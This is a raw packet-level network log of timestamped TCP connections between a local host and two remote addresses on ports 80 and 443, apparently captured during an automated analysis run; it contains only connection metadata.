Jul 26, 2024 12:57:17.262634039 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.262644053 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.439393997 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.439727068 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.559902906 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.560276031 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.565402031 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.565479040 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.565884113 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.565949917 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.569570065 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.574599028 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.951606035 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.951760054 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.952358961 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.952375889 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.954158068 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.954169035 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.675945997 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:18.676043987 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:18.676935911 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:18.698018074 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:18.698107958 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:18.704757929 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:18.705172062 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.705239058 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.705250978 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705301046 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.705336094 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705358982 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705369949 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.705420017 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705490112 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.705542088 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705670118 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.705694914 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.717483044 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.717556000 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.717644930 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.717906952 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:18.717935085 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:18.953749895 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:18.954058886 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.069746017 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.070039034 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.075253010 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:19.075373888 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.075508118 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.080594063 CEST	80	60792	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:19.080667973 CEST	60792	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.080761909 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:19.445916891 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:19.446064949 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:19.446607113 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:19.446634054 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:19.448453903 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:19.448467970 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:19.826112986 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:19.826419115 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.827367067 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:19.832269907 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:20.077128887 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:20.077349901 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.109555960 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.109658003 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.109719038 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.109762907 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.109781027 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.109817982 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.109920979 CEST	60793	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.109955072 CEST	443	60793	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.179394007 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.179723978 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.185036898 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:20.185148954 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.185275078 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.185534000 CEST	80	60794	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:20.185729980 CEST	60794	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:20.190535069 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:20.204346895 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.204436064 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.204545021 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.204886913 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.204967976 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.865900993 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.865992069 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.866600037 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.866610050 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.868355036 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.868360043 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:20.868405104 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:20.868415117 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.028665066 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.028908014 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.029454947 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.035442114 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.293243885 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.293366909 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.413717031 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.414103031 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.419223070 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.419358969 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.419518948 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.421539068 CEST	80	60795	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.421611071 CEST	60795	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:21.425987959 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:21.468314886 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.468420982 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.468509912 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.468760967 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.468791008 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.491252899 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.491333961 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.491396904 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.491436005 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:21.491468906 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.491520882 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.492330074 CEST	60796	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:21.492362976 CEST	443	60796	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.344541073 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.344723940 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.345284939 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.345776081 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.345845938 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.346266031 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.346272945 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.347945929 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.347950935 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.363888025 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.612396002 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.612508059 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.726016045 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.726270914 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.731553078 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.731662035 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.732737064 CEST	80	60797	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.732796907 CEST	60797	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.734181881 CEST	60799	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:22.739557028 CEST	80	60799	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:22.790611029 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.790668964 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.790709972 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.790816069 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.790834904 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.790909052 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.820501089 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.820558071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.820610046 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.820621014 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.820667982 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.887139082 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.887201071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.887305021 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.887305021 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.887341976 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.887403965 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.917234898 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.917279959 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.917464972 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.917486906 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.917552948 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.955737114 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.955805063 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.956032038 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.956032038 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.956114054 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.956185102 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.982462883 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.982494116 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.982743979 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:22.982812881 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:22.982883930 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.001000881 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.001045942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.001213074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.001213074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.001279116 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.001339912 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.015891075 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.015932083 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.016004086 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.016014099 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.016051054 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.016072989 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.033994913 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.034020901 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.034111977 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.034126997 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.034167051 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.054125071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.054162025 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.054233074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.054259062 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.054294109 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.054317951 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.074079037 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.074135065 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.074218035 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.074289083 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.074328899 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.074352980 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.089090109 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.089133978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.089358091 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.089358091 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.089428902 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.089490891 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.100178003 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.100230932 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.100358009 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.100374937 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.100435019 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.105086088 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.105128050 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.105185986 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.105197906 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.105237007 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.105253935 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.127191067 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.127234936 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.127336979 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.127413034 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.127455950 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.127480030 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.128678083 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.128719091 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.128767967 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.128782034 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.128815889 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.128839970 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.142236948 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.142280102 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.142381907 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.142395020 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.142427921 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.142457962 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.144125938 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.144167900 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.144217014 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.144227982 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.144273043 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.144289970 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.160937071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.160975933 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.161201000 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.161201954 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.161269903 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.161328077 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.179375887 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.179415941 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.179580927 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.179582119 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.179647923 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.179708958 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.189785957 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.189862967 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.189882994 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.189897060 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.189934969 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.189958096 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.196424961 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.196465969 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.196528912 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.196541071 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.196574926 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.196598053 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.207957029 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.207997084 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.208084106 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.208096981 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.208142042 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.208163977 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.214092016 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.214133024 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.214304924 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.214304924 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.214370966 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.214432001 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.228792906 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.228833914 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.229069948 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.229132891 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.229218960 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.229959011 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.230003119 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.230040073 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.230047941 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.230086088 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.230110884 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.265870094 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.265928030 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.266071081 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.266071081 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.266094923 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.266149044 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.275587082 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.275626898 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.275774002 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.275788069 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.275820971 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.275854111 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.282872915 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.282916069 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.282968998 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.282982111 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.283019066 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.283036947 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.285933018 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.285991907 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.286014080 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.286024094 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.286067009 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.286086082 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.297671080 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.297713995 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.297785997 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.297806978 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.297832966 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.297864914 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.304857969 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.304897070 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.305093050 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.305093050 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.305157900 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.305228949 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.319417953 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.319479942 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.319576979 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.319595098 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.319647074 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.319674015 CEST	60798	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:23.320713043 CEST	443	60798	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:23.320758104 CEST	443	60798	5.75.212.60	192.168.2.6
